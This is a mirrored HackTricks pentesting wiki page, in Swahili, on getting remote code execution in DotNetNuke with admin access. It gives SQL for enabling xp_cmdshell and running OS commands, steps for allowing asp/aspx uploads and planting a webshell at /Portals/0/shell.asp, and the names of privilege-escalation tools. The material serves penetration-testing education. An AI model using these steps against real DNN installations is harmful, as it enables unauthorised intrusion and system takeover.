maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

41 lines
1.2 KiB
Markdown
Raw Blame History

# DotNetNuke (DNN)
{{#include ../../banners/hacktricks-training.md}}
## DotNetNuke (DNN)
Ikiwa unaingia kama **meneja** katika DNN ni rahisi kupata RCE.
## RCE
### Kupitia SQL
Konsoli ya SQL inapatikana chini ya ukurasa wa **`Settings`** ambapo unaweza kuwezesha **`xp_cmdshell`** na **kufanya amri za mfumo wa uendeshaji**.
Tumia mistari hii kuwezesha **`xp_cmdshell`**:
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
Na bonyeza **"Run Script"** ili kuendesha sentensi hizo za sQL.
Kisha, tumia kitu kama ifuatavyo kuendesha amri za OS:
```sql
xp_cmdshell 'whoami'
```
### Via ASP webshell
Katika `Settings -> Security -> More -> More Security Settings` unaweza **kuongeza nyongeza mpya zinazoruhusiwa** chini ya `Allowable File Extensions`, na kisha kubonyeza kitufe cha `Save`.
Ongeza **`asp`** au **`aspx`** na kisha katika **`/admin/file-management`** pakia **asp webshell** inayoitwa `shell.asp` kwa mfano.
Kisha upate **`/Portals/0/shell.asp`** ili kufikia webshell yako.
### Privilege Escalation
Unaweza **kuinua mamlaka** kwa kutumia **Potatoes** au **PrintSpoofer** kwa mfano.
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink